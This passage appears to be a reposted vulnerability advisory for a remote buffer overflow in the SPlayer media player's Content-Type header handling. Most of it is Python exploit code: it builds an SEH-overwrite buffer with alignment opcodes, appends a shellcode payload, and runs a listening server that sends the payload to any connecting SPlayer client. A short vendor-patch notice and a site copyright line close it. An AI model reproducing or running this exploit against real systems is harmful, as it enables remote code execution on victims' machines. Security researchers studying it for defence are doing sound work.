Type" Header Remote Buffer Overflow Vulnerability (2)

        #Begin evil buffer
        evil = "\x41" * 2073
        evil += "\x61\x73"            #popad/nop align

        evil += "\x25\x73"            #SE handler - ppr/splayer.exe [0x00730025]

        #Close the blinds
        evil += "\x73"                #nop/align
        evil += "\x55"                #push ebp
        evil += "\x73"                #nop/align
        evil += "\x58"                #pop eax
        evil += "\x73"                #nop/align

        #Align to EAX/execute shellcode
        evil += "\x05\x19\x11"        #add eax, 0x11001900
        evil += "\x73"                #nop/align
        evil += "\x2d\x11\x11"        #sub eax, 0x11001100
        evil += "\x73"                #nop/align
        evil += "\x50"                #push eax
        evil += "\x73"                #nop/align
        evil += "\xc3"                #ret

        evil += "\x46" * 1004         #align shellcode->EAX
        #End evil buffer

        padding = "\x44" * (30000 - len(pre + evil + calcshell)) + "\r\n"
        payload = pre + evil + calcshell + padding

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind((bindaddr, bindport))
            s.listen(5)
            print "[+] Listening for incoming connections on port: %d" % bindport + " ..."
        except:
            print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"
            sys.exit()

        # Note: SPlayer seems to connect/send a GET request twice every time a URL is processed
        # and it crashes after the second request

        while 1:
            (clientsock, address) = s.accept()
            print "[*] New connection from", address[0]
            clientsock.recv(1024)
            sent = clientsock.send(payload)
            print "[+] Payload sent successfully [size: %d bytes]" % sent
            sent = 0
            print "[-] Closing connection to", address[0]
            clientsock.close()

if __name__ == "__main__":
    Client().about()
    Client().run()

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Splayer
-------
The vendor has not yet released a patch or upgrade; users of this software are advised to check the vendor's homepage regularly for the latest version:

Content copyright notice: unless otherwise stated, all articles are original to this site.

Reprints must credit the source: https://www.heiqu.com/wwxsxx.html